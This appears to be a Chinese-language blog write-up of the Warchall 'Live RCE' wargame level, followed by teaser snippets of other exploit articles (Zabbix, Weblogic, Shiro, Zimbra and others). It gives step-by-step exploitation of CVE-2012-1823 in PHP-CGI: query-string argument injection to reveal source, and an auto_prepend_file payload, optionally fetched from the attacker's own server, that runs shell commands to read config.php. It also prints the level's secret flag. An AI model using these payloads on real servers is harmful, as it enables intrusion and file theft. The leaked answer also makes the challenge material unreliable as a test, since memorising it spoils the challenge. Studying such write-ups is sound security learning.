Warchall: Live RCE

具体漏洞是:CVE-2012-1823(PHP-CGI RCE)

在地址后面加进参数运行对应的php-cgi 参数的行为

例如 index.php?-s

相参于/usr/bin/php53-cgi/php-cgi -f index.php -s

php-cgi --help如下:

Usage: php-cgi [-q] [-h] [-s] [-v] [-i] [-f <file>]
       php-cgi <file> [args...]
  -a               Run interactively
  -b <address:port>|<port> Bind Path for external FASTCGI Server mode
  -C               Do not chdir to the script‘s directory
  -c <path>|<file> Look for php.ini file in this directory
  -n               No php.ini file will be used
  -d foo[=bar]     Define INI entry foo with value ‘bar‘
  -e               Generate extended information for debugger/profiler
  -f <file>        Parse <file>.  Implies `-q‘
  -h               This help
  -i               PHP information
  -l               Syntax check only (lint)
  -m               Show compiled in modules
  -q               Quiet-mode.  Suppress HTTP Header output.
  -s               Display colour syntax highlighted source.
  -v               Version number
  -w               Display source with stripped comments and whitespace.
  -z <file>        Load Zend extension <file>.
  -T <count>       Measure execution time of script repeated <count> times.

http://rce.warchall.net/?-s

看到index.php的源代码

基中有一个语句是:require ‘../config.php‘;

然后我们想办法读到这个文件

index.php 的绝对路径是:/home/level/20_live_rce/www/index.php../config.php 的绝对路径是:/home/level/20_live_rce/config.ph想办法输出config.php 的源代码。

php-cgi参数中:d foo[=bar]     Define INI entry foo with value ‘bar‘-dallow_url_include=Ondauto_prepend_file=/tmp/2.php在/tmp里建立一个2.php内容是:
<?php
exec("cat /home/level/20_live_rce/config.php",$out);
print_r($out);
?>

提交地址:(地址里,这个/tmp/2 可以换在自己的服务 http://xxx.xxx/1.txt)

http://rce.warchall.net/?-dallow_url_include=On+-dauto_prepend_file=/tmp/2.php+-n

URLencode一下是:

http://rce.warchall.net/?-dallow_url_include%3DOn+-dauto_prepend_file%3D%2ftmp%2f2.php+-n

得到 ../config.php的源代码:

Array ( [0] => define(‘ICANHAZRCE‘, ‘StrongGard_6_3‘);
[2] => return ICANHAZRCE;
[3] => ?> ) 
时间: 2024-10-14 21:06:45

Warchall: Live RCE的相关文章

Zabbix 2.2 &lt; 3.0.3 - RCE with API JSON-RPC

漏洞来源: https://www.exploit-db.com/exploits/39937/ 攻击成本:高 危害程度:低(此洞需要密码) 利用条件: 需要高权限用户登录 影响范围:2.2 < 3.0.3 tips:   此洞需要你拿到高权限的账户密码,当你拿到账户密码之后,进入后台也可以执行命令,利用API JSON-RPC为第二种方案.   此exp并不是很完美,因为不会自动获取hostid. #!/usr/bin/env python # -*- coding: utf-8 -*- # 

PHP FastCGI RCE Vul

catalog 1. Introduction 2. nginx文件类型错误解析漏洞 3. 针对直接公网开放的Fast-CGI攻击 4. 通过FCGI API动态修改php.ini中的配置实现RCE 1. Introduction 我们首先来梳理一下CGI的相关概念 1. CGI CGI是为了保证web server传递过来的数据是标准格式的,从本质上来说,它是一个协议标准.web server(例如nginx)只是内容的分发者.比如 1) 如果请求/index.html,那么web serve

记一次python沙箱逃逸绕过(time based rce)

前几天参加了第八届swpu,题目质量很高,学到了很多东西.这里我就一道Python沙箱逃逸题目做一些总结. 题目过滤的很严格,文件读写,网络请求和一些危险模块都被ban掉了.甚至是下划线也会被检测到,这也使得__builtin__,[].__class__.__base__.__subclasses__()魔术方法无法利用. 最后得知利用的是一个内置模块:timeit.我相信很多初学python的人都会用到timeit模块来获取代码的执行时间,参看其文档可以看到这样的用法可以导致任意代码执行.

Weblogic wls RCE 漏洞验证POC

#!/usr/bin/env python # coding:utf-8 # @Date : 2017/12/22 17:11 # @File : weblogic_poc.py # @Author : sevck ([email protected]) # @Link : http://www.qingteng.cn #------------------------------------------------------------------------- import request

Apache Shiro 反序列化RCE漏洞

漏洞介绍 漏洞类型 :JAVA反序列化(RCE) 影响版本 :Apache Shiro 1.2.4及其之前版本 漏洞评级 :高危 漏洞分析 #: 下载漏洞环境: git clone https://github.com/apache/shiro.git git checkout shiro-root-1.2.4 工具下载 git clone https://github.com/frohoff/ysoserial.git cd ysoserial mvn package -DskipTests

Nexus Repository Manager 3 RCE CVE-2019-7238

Nexus Repository Manager 3 RCE CVE-2019-7238 0x00 参考链接 https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 0x01 影响版本 Nexus Repository

StackStorm利用CORS null origin获得RCE (CVE-2019-9580)

在2.10.3/2.9.3之前,如果请求的来源未知,我们将返回null,null可以导致某些客户端中来自未知来源的成功请求,允许针对StackStorm API进行XSS样式攻击. (Firefox上的用户是受害者,Chrome上的用户是攻击者) 利用null CORS 通过使用null Origin头向StackStorm API发送请求Origin:null,服务器以Access-Control-Allow-Originto 响应null GET /api/v1/executions?act

聊聊 WordPress 5.1.1 CSRF to RCE 漏洞

作者:LoRexxar'@知道创宇404实验室时间:2019年3月14日 2019年3月13日, RIPS团队公开了一篇关于WordPress 5.1.1的XSS漏洞详情,标题起的很响亮,叫做wordpress csrf to rce, https://blog.ripstech.com/2019/wordpress-csrf-to-rce/ 下面我们就来详细聊聊这个漏洞. 关于WordPress防护 早在2017年10月25号,我曾经写过一篇关于WordPress安全机制的文章. https:

Zimbra无需登录RCE漏洞利用

2019年3月13号,一名国外的安全研究员在他的博客上公布了zimbra RCE漏洞相关信息,但其中并未提到一些漏洞利用细节. 经过一段时间努力,根据网上各位大牛的分析和我自己的理解,在此我将整个漏洞的利用过程进行复现. 第一步:利用XXE读取配置文件 这里利用了CVE-2019-9670漏洞来读取配置文件,你需要在自己的VPS服务器上放置一个dtd文件,并使该文件能够通过HTTP访问.为了演示,我在GitHub上创建了一个仓库,从GitHub上获取dtd文件. 上图中用红框圈起来的就是zimb